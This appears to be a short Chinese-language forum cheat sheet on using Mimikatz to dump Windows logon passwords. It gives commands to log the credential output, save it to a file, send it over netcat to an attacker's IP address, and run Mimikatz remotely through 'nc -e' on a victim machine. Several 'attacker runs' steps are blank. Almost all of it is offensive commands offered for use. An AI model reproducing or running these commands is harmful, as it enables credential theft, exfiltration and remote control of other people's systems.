|
1.记录 Mimikatz输出:
- C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
复制代码
2.将输出导入到本地文件:
- C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
复制代码
3.将输出传输到远程机器:
Attacker执行:
Victim执行:
- C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
复制代码
192.168.52.1 为Attacker IP
4.通过nc远程执行Mimikatz:
Victim执行:
Attacker执行:
- E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
复制代码
192.168.52.128 为Victim IP |
|